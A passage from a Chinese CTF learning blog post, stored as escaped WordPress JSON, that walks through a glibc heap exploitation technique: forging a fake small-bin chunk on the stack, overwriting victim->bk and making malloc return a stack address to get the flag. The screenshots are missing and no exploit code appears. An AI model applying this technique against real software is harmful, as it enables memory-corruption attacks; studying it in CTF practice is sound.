        \u8fd9\u9053\u9898\u7684\u653b\u51fb\u6d41\u7a0b<\/h3>\n\n\n\n
        \u6765\u7c97\u7565\u7684\u8c03\u8bd5\u770b\u770b\u8fd9\u9053\u9898\u7684\u6d41\u7a0b<\/p>\n\n\n\n
        \u9996\u5148\u7533\u8bf7\u4e00\u4e2a\u5728fastbin\u8303\u56f4\u7684chunk<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u63a5\u7740\u5c31\u662f\u5728\u4f2a\u9020fake chunk<\/p>\n\n\n\n
        \u6211\u4eec\u5148\u628a\u53e6\u5916\u4e00\u4e2a\u5806\u521b\u5efa\u597d\u518d\u6765\u770b\u770b\u6808\u4e0a\u7684\u60c5\u51b5<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u73b0\u5728\u5df2\u7ecf\u7ed5\u8fc7\u68c0\u64e6\uff0c\u63a5\u4e0b\u6765free victim chunk\u8fdb\u5165fastbin<\/p>\n\n\n\n
        fd\u73b0\u5728\u662f0<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n

        \u63a5\u4e0b\u6765\u5c06\u4f1a\u518d\u53d6\u51fa\u65f6\u89e6\u53d1\u673a\u5173\u8fdb\u5165smollbin\uff0c\u7136\u540e\u8986\u76d6bk<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n

        \u63a5\u4e0b\u6765\u662f\u5229\u7528smollbin\u7684\u6f0f\u6d1e\u8986\u76d6bk<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u6b64\u65f6bk\u6210\u4e3a\u4e86\u6808\u4e0a\u7684\u5730\u5740<\/p>\n\n\n\n
        \u7136\u540emalloc\u5148\u53d6\u8d70victim chunk<\/p>\n\n\n\n
        \u53ef\u4ee5\u89c2\u5bdfbin\u94fe\u8868\u7684\u53d8\u5316<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u73b0\u5728\u662f\u8fd9\u6837<\/p>\n\n\n\n
        malloc\u4e00\u6b21\u540e\uff1a<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n

        \u6700\u540emalloc\u8fd4\u56de\u6808\u5730\u5740<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n

        \u53ef\u4ee5\u770b\u52300x7fffffffde70\u5df2\u7ecf\u51fa\u53bb\u4e86<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \n
        \u6808\u4e0a\u4f2a\u9020 small bin chunk<\/p>\n\n\n\n
        \u2192 fastbin free<\/p>\n\n\n\n
        \u2192 consolidate \u8fdb small bin<\/p>\n\n\n\n
        \u2192 \u8986\u76d6 victim->bk<\/p>\n\n\n\n
        \u2192 small bin unlink \u68c0\u67e5\u7ed5\u8fc7<\/p>\n\n\n\n
        \u2192 malloc \u8fd4\u56de\u6808\u5730\u5740<\/p>\n<\/div>\n\n\n\n

        \u6700\u540e\u62ff\u4e2aflag\u5427<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n

        ok,\u524d\u7f6e\u5148\u5230\u8fd9\u91cc\uff0c\u56e0\u4e3a\u5b66\u591a\u4e86\u4e5f\u4e0d\u719f\u7ec3\uff0c\u5148\u5f80\u540e\u505a\u51e0\u4e2a\u7b80\u5355\u7684\u5e94\u7528\u52a0\u6df1\u7406\u89e3\u5427~<\/p>\n\n\n\n
        <\/p>\n","protected":false},"excerpt":{"rendered":"
        pwn150(unsafe_unlink) unsafe_unlink \u7ee7\u7eed\u5b66\u4e60\u65b0\u77e5\u8bc6\uff0c\u5148\u6765checksec\u4e00 […]<\/p>\n","protected":false},"author":1,"featured_media":847,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[14,1],"tags":[4,6],"class_list":["post-792","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-14","category-learn","tag-pwn","tag-6"],"_links":{"self":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts\/792","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/comments?post=792"}],"version-history":[{"count":1,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts\/792\/revisions"}],"predecessor-version":[{"id":846,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts\/792\/revisions\/846"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/media\/847"}],"wp:attachment":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/media?parent=792"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/categories?post=792"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/tags?post=792"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}